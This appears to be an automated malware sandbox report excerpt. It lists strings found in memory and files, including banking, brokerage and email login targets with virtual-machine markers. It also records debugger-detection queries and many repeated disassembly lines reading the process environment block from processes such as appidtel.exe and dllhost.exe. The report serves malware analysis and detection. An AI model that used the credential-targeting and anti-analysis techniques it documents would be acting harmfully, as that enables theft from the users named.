              Source: -400GIK8.11.drBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: -400GIK8.11.drBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: -400GIK8.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: -400GIK8.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: omVMware4
              Source: -400GIK8.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20D
              Source: -400GIK8.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: -400GIK8.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: powershell.exe, 00000004.00000002.2358982839.000001FEBE0C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWcl%SystemRoot%\system32\mswsock.dll
              Source: -400GIK8.11.drBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: -400GIK8.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: -400GIK8.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: -400GIK8.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: -400GIK8.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20
              Source: -400GIK8.11.drBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: -400GIK8.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: -400GIK8.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: -400GIK8.11.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: dllhost.exe, 0000000B.00000002.3415350105.0000000007FD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive Brokers - NDCDYNVMware20,11696487552z
              Source: -400GIK8.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: -400GIK8.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\appidtel.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032BD1C0 rdtsc 5_2_032BD1C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_00417443 LdrLoadDll,5_2_00417443
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326F32A mov eax, dword ptr fs:[00000030h]5_2_0326F32A
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03237330 mov eax, dword ptr fs:[00000030h]5_2_03237330
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330132D mov eax, dword ptr fs:[00000030h]5_2_0330132D
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330132D mov eax, dword ptr fs:[00000030h]5_2_0330132D
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C930B mov eax, dword ptr fs:[00000030h]5_2_032C930B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C930B mov eax, dword ptr fs:[00000030h]5_2_032C930B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C930B mov eax, dword ptr fs:[00000030h]5_2_032C930B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327A30B mov eax, dword ptr fs:[00000030h]5_2_0327A30B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327A30B mov eax, dword ptr fs:[00000030h]5_2_0327A30B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327A30B mov eax, dword ptr fs:[00000030h]5_2_0327A30B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323C310 mov ecx, dword ptr fs:[00000030h]5_2_0323C310
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03260310 mov ecx, dword ptr fs:[00000030h]5_2_03260310
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032FF367 mov eax, dword ptr fs:[00000030h]5_2_032FF367
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032E437C mov eax, dword ptr fs:[00000030h]5_2_032E437C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03247370 mov eax, dword ptr fs:[00000030h]5_2_03247370
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03247370 mov eax, dword ptr fs:[00000030h]5_2_03247370
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03247370 mov eax, dword ptr fs:[00000030h]5_2_03247370
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330A352 mov eax, dword ptr fs:[00000030h]5_2_0330A352
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h]5_2_032C2349
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h]5_2_032C2349
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h]5_2_032C2349
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h]5_2_032C2349
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h]5_2_032C2349
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h]5_2_032C2349
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h]5_2_032C2349
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h]5_2_032C2349
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h]5_2_032C2349
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h]5_2_032C2349
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h]5_2_032C2349
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h]5_2_032C2349
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h]5_2_032C2349
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h]5_2_032C2349
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C2349 mov eax, dword ptr fs:[00000030h]5_2_032C2349
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323D34C mov eax, dword ptr fs:[00000030h]5_2_0323D34C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323D34C mov eax, dword ptr fs:[00000030h]5_2_0323D34C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03315341 mov eax, dword ptr fs:[00000030h]5_2_03315341
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03239353 mov eax, dword ptr fs:[00000030h]5_2_03239353
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03239353 mov eax, dword ptr fs:[00000030h]5_2_03239353
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C035C mov eax, dword ptr fs:[00000030h]5_2_032C035C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C035C mov eax, dword ptr fs:[00000030h]5_2_032C035C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C035C mov eax, dword ptr fs:[00000030h]5_2_032C035C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C035C mov ecx, dword ptr fs:[00000030h]5_2_032C035C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C035C mov eax, dword ptr fs:[00000030h]5_2_032C035C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C035C mov eax, dword ptr fs:[00000030h]5_2_032C035C
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032633A5 mov eax, dword ptr fs:[00000030h]5_2_032633A5
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032733A0 mov eax, dword ptr fs:[00000030h]5_2_032733A0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032733A0 mov eax, dword ptr fs:[00000030h]5_2_032733A0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326438F mov eax, dword ptr fs:[00000030h]5_2_0326438F
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326438F mov eax, dword ptr fs:[00000030h]5_2_0326438F
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323E388 mov eax, dword ptr fs:[00000030h]5_2_0323E388
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323E388 mov eax, dword ptr fs:[00000030h]5_2_0323E388
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323E388 mov eax, dword ptr fs:[00000030h]5_2_0323E388
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0331539D mov eax, dword ptr fs:[00000030h]5_2_0331539D
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0329739A mov eax, dword ptr fs:[00000030h]5_2_0329739A
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0329739A mov eax, dword ptr fs:[00000030h]5_2_0329739A
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03238397 mov eax, dword ptr fs:[00000030h]5_2_03238397
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03238397 mov eax, dword ptr fs:[00000030h]5_2_03238397
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03238397 mov eax, dword ptr fs:[00000030h]5_2_03238397
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032FF3E6 mov eax, dword ptr fs:[00000030h]5_2_032FF3E6
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032503E9 mov eax, dword ptr fs:[00000030h]5_2_032503E9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032503E9 mov eax, dword ptr fs:[00000030h]5_2_032503E9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032503E9 mov eax, dword ptr fs:[00000030h]5_2_032503E9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032503E9 mov eax, dword ptr fs:[00000030h]5_2_032503E9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032503E9 mov eax, dword ptr fs:[00000030h]5_2_032503E9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032503E9 mov eax, dword ptr fs:[00000030h]5_2_032503E9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032503E9 mov eax, dword ptr fs:[00000030h]5_2_032503E9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032503E9 mov eax, dword ptr fs:[00000030h]5_2_032503E9
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033153FC mov eax, dword ptr fs:[00000030h]5_2_033153FC
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325E3F0 mov eax, dword ptr fs:[00000030h]5_2_0325E3F0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325E3F0 mov eax, dword ptr fs:[00000030h]5_2_0325E3F0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0325E3F0 mov eax, dword ptr fs:[00000030h]5_2_0325E3F0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032763FF mov eax, dword ptr fs:[00000030h]5_2_032763FF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032FC3CD mov eax, dword ptr fs:[00000030h]5_2_032FC3CD
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324A3C0 mov eax, dword ptr fs:[00000030h]5_2_0324A3C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324A3C0 mov eax, dword ptr fs:[00000030h]5_2_0324A3C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324A3C0 mov eax, dword ptr fs:[00000030h]5_2_0324A3C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324A3C0 mov eax, dword ptr fs:[00000030h]5_2_0324A3C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324A3C0 mov eax, dword ptr fs:[00000030h]5_2_0324A3C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324A3C0 mov eax, dword ptr fs:[00000030h]5_2_0324A3C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032483C0 mov eax, dword ptr fs:[00000030h]5_2_032483C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032483C0 mov eax, dword ptr fs:[00000030h]5_2_032483C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032483C0 mov eax, dword ptr fs:[00000030h]5_2_032483C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032483C0 mov eax, dword ptr fs:[00000030h]5_2_032483C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C63C0 mov eax, dword ptr fs:[00000030h]5_2_032C63C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032FB3D0 mov ecx, dword ptr fs:[00000030h]5_2_032FB3D0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03315227 mov eax, dword ptr fs:[00000030h]5_2_03315227
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323823B mov eax, dword ptr fs:[00000030h]5_2_0323823B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03277208 mov eax, dword ptr fs:[00000030h]5_2_03277208
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03277208 mov eax, dword ptr fs:[00000030h]5_2_03277208
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03244260 mov eax, dword ptr fs:[00000030h]5_2_03244260
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03244260 mov eax, dword ptr fs:[00000030h]5_2_03244260
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03244260 mov eax, dword ptr fs:[00000030h]5_2_03244260
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323826B mov eax, dword ptr fs:[00000030h]5_2_0323826B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03269274 mov eax, dword ptr fs:[00000030h]5_2_03269274
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03281270 mov eax, dword ptr fs:[00000030h]5_2_03281270
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03281270 mov eax, dword ptr fs:[00000030h]5_2_03281270
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330D26B mov eax, dword ptr fs:[00000030h]5_2_0330D26B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0330D26B mov eax, dword ptr fs:[00000030h]5_2_0330D26B
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h]5_2_032F0274
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h]5_2_032F0274
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h]5_2_032F0274
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h]5_2_032F0274
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h]5_2_032F0274
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h]5_2_032F0274
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h]5_2_032F0274
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h]5_2_032F0274
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h]5_2_032F0274
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h]5_2_032F0274
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h]5_2_032F0274
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F0274 mov eax, dword ptr fs:[00000030h]5_2_032F0274
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03239240 mov eax, dword ptr fs:[00000030h]5_2_03239240
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03239240 mov eax, dword ptr fs:[00000030h]5_2_03239240
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327724D mov eax, dword ptr fs:[00000030h]5_2_0327724D
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C8243 mov eax, dword ptr fs:[00000030h]5_2_032C8243
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C8243 mov ecx, dword ptr fs:[00000030h]5_2_032C8243
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323A250 mov eax, dword ptr fs:[00000030h]5_2_0323A250
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032FB256 mov eax, dword ptr fs:[00000030h]5_2_032FB256
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032FB256 mov eax, dword ptr fs:[00000030h]5_2_032FB256
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032CD250 mov ecx, dword ptr fs:[00000030h]5_2_032CD250
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03246259 mov eax, dword ptr fs:[00000030h]5_2_03246259
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032552A0 mov eax, dword ptr fs:[00000030h]5_2_032552A0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032552A0 mov eax, dword ptr fs:[00000030h]5_2_032552A0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032552A0 mov eax, dword ptr fs:[00000030h]5_2_032552A0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032552A0 mov eax, dword ptr fs:[00000030h]5_2_032552A0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D62A0 mov eax, dword ptr fs:[00000030h]5_2_032D62A0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D62A0 mov ecx, dword ptr fs:[00000030h]5_2_032D62A0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D62A0 mov eax, dword ptr fs:[00000030h]5_2_032D62A0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D62A0 mov eax, dword ptr fs:[00000030h]5_2_032D62A0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D62A0 mov eax, dword ptr fs:[00000030h]5_2_032D62A0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D62A0 mov eax, dword ptr fs:[00000030h]5_2_032D62A0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D72A0 mov eax, dword ptr fs:[00000030h]5_2_032D72A0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032D72A0 mov eax, dword ptr fs:[00000030h]5_2_032D72A0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C92BC mov eax, dword ptr fs:[00000030h]5_2_032C92BC
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C92BC mov eax, dword ptr fs:[00000030h]5_2_032C92BC
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C92BC mov ecx, dword ptr fs:[00000030h]5_2_032C92BC
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C92BC mov ecx, dword ptr fs:[00000030h]5_2_032C92BC
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033092A6 mov eax, dword ptr fs:[00000030h]5_2_033092A6
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033092A6 mov eax, dword ptr fs:[00000030h]5_2_033092A6
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033092A6 mov eax, dword ptr fs:[00000030h]5_2_033092A6
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033092A6 mov eax, dword ptr fs:[00000030h]5_2_033092A6
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327E284 mov eax, dword ptr fs:[00000030h]5_2_0327E284
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327E284 mov eax, dword ptr fs:[00000030h]5_2_0327E284
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C0283 mov eax, dword ptr fs:[00000030h]5_2_032C0283
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C0283 mov eax, dword ptr fs:[00000030h]5_2_032C0283
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032C0283 mov eax, dword ptr fs:[00000030h]5_2_032C0283
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03315283 mov eax, dword ptr fs:[00000030h]5_2_03315283
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327329E mov eax, dword ptr fs:[00000030h]5_2_0327329E
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0327329E mov eax, dword ptr fs:[00000030h]5_2_0327329E
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h]5_2_032F12ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h]5_2_032F12ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h]5_2_032F12ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h]5_2_032F12ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h]5_2_032F12ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h]5_2_032F12ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h]5_2_032F12ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h]5_2_032F12ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h]5_2_032F12ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h]5_2_032F12ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h]5_2_032F12ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h]5_2_032F12ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h]5_2_032F12ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032F12ED mov eax, dword ptr fs:[00000030h]5_2_032F12ED
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032502E1 mov eax, dword ptr fs:[00000030h]5_2_032502E1
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032502E1 mov eax, dword ptr fs:[00000030h]5_2_032502E1
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032502E1 mov eax, dword ptr fs:[00000030h]5_2_032502E1
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_033152E2 mov eax, dword ptr fs:[00000030h]5_2_033152E2
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032FF2F8 mov eax, dword ptr fs:[00000030h]5_2_032FF2F8
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032392FF mov eax, dword ptr fs:[00000030h]5_2_032392FF
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032492C5 mov eax, dword ptr fs:[00000030h]5_2_032492C5
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032492C5 mov eax, dword ptr fs:[00000030h]5_2_032492C5
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h]5_2_0326B2C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h]5_2_0326B2C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h]5_2_0326B2C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h]5_2_0326B2C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h]5_2_0326B2C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h]5_2_0326B2C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326B2C0 mov eax, dword ptr fs:[00000030h]5_2_0326B2C0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324A2C3 mov eax, dword ptr fs:[00000030h]5_2_0324A2C3
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324A2C3 mov eax, dword ptr fs:[00000030h]5_2_0324A2C3
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324A2C3 mov eax, dword ptr fs:[00000030h]5_2_0324A2C3
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324A2C3 mov eax, dword ptr fs:[00000030h]5_2_0324A2C3
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0324A2C3 mov eax, dword ptr fs:[00000030h]5_2_0324A2C3
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323B2D3 mov eax, dword ptr fs:[00000030h]5_2_0323B2D3
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323B2D3 mov eax, dword ptr fs:[00000030h]5_2_0323B2D3
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323B2D3 mov eax, dword ptr fs:[00000030h]5_2_0323B2D3
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326F2D0 mov eax, dword ptr fs:[00000030h]5_2_0326F2D0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0326F2D0 mov eax, dword ptr fs:[00000030h]5_2_0326F2D0
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03270124 mov eax, dword ptr fs:[00000030h]5_2_03270124
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03241131 mov eax, dword ptr fs:[00000030h]5_2_03241131
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03241131 mov eax, dword ptr fs:[00000030h]5_2_03241131
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323B136 mov eax, dword ptr fs:[00000030h]5_2_0323B136
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323B136 mov eax, dword ptr fs:[00000030h]5_2_0323B136
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323B136 mov eax, dword ptr fs:[00000030h]5_2_0323B136
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323B136 mov eax, dword ptr fs:[00000030h]5_2_0323B136
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_03300115 mov eax, dword ptr fs:[00000030h]5_2_03300115
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032EA118 mov ecx, dword ptr fs:[00000030h]5_2_032EA118
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032EA118 mov eax, dword ptr fs:[00000030h]5_2_032EA118
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032EA118 mov eax, dword ptr fs:[00000030h]5_2_032EA118
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_032EA118 mov eax, dword ptr fs:[00000030h]5_2_032EA118
              Source: C:\Windows\SysWOW64\appidtel.exeCode function: 5_2_0323F172 mov eax, dword ptr fs:[00000030h]5_2_0323F172
